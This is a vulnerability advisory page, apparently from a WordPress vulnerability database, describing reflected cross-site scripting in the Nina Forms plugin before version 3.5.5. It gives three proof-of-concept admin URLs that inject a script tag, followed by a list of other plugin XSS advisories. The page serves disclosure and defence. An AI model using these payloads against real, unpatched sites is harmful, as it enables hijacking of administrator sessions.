Nina Forms < 3.5.5 – Reflected Cross-Site Scripting | Plugin Vulnerabilities

Description

The plugin does not escape generated links before outputting them in attributes, leading to Reflected Cross-Site Scripting

Proof of Concept

https://example.com/wp-admin/admin.php?page=nf-settings&"><script>alert(/XSS/)</script>
https://example.com/wp-admin/admin.php?page=nf-import-export&"><script>alert(/XSS/)</script>
https://example.com/wp-admin/edit.php?post_status=all&post_type=nf_sub&form_id=1&"><script>alert(/XSS/)</script> (need valid form id)

Affects Plugins

Fixed in 3.5.5

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

ba6fa3d6-e3f7-449a-bd78-d57c26a67aa6

Timeline

Publicly Published

2021-06-07 (about 4 years ago)

Added

2022-06-07 (about 3 years ago)

Last Updated

2022-06-07 (about 3 years ago)

Other

Published

Title

Published

2025-01-08

Title

Muslim Prayer Time-Salah/Iqamah < 1.8.12 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-03-21

Title

Getwid – Gutenberg Blocks < 2.0.6 - Authenticated(Contributor+) Stored Cross-Site Scripting via Block Content

Published

2024-10-09

Title

CM Tooltip Glossary < 4.3.11 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-09-24

Title

Medical Addon for Elementor <= 1.6.4 - Contributor+ Stored XSS

Published

2023-06-05

Title

Social Media Share Buttons & Social Sharing Icons < 2.8.2 - Admin+ Stored XSS